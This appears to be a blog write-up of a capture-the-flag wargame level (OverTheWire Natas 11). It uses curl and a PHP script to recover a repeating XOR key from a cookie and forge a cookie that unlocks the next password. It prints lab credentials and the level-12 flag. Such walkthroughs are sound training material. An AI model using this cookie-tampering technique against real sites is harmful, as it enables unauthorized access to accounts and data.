Username: natas11
Password: 1KFqoJXi6hRaPluAmk8ESDW4fSysRoIg
URL: http://natas11.natas.labs.overthewire.org
1
curl -i -XGET -u natas11:1KFqoJXi6hRaPluAmk8ESDW4fSysRoIg http://natas11.natas.labs.overthewire.org/ | grep -i set-cookie
==> Set-Cookie: data=MGw7JCQ5OC04PT8jOSpqdmkgJ25nbCorKCEkIzlscm5oKC4qLSgubjY%3D
Note that: sudo apt install php
Create file decode cookie
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
nvim natas11.php
<?php
$defaultdata = array( "showpassword"=>"yes", "bgcolor"=>"#ffffff");
function xor_encrypt($in) {
$key = base64_decode('MGw7JCQ5OC04PT8jOSpqdmkgJ25nbCorKCEkIzlscm5oKC4qLSgubjY%3D');
$text = $in;
$outText = '';
for($i=0;$i<strlen($text);$i++) {
$outText .= $text[$i] ^ $key[$i % strlen($key)];
}
return $outText;
}
$key = xor_encrypt(json_encode($defaultdata));
echo "$key"
?>
php -f natas11.php
==> KNHLKNHLKNHLKNHLKYBEIOBKOVPTJ–> KNHL
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
$defaultdata = array( "showpassword"=>"yes", "bgcolor"=>"#ffffff");
function xor_encrypt($in) {
$key = 'KNHL';
$text = $in;
$outText = '';
for($i=0;$i<strlen($text);$i++) {
$outText .= $text[$i] ^ $key[$i % strlen($key)];
}
return $outText;
}
$key = base64_encode(xor_encrypt(json_encode($defaultdata)));
echo "$key"
?>
php -f natas11.php
1
curl -i -XPOST -u natas11:1KFqoJXi6hRaPluAmk8ESDW4fSysRoIg http://natas11.natas.labs.overthewire.org/ -d "bgcolor=#ffffff" -d "submit=" --cookie data=MGw7JCQ5OC04PT8jOSpqdmk3LT9pYmouLC0nICQ8anZpbS4qLSguKmkz
Alright, i got the password! Moving on to level 12!
==> CTF: { natas12:YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG }
Comments powered by Disqus.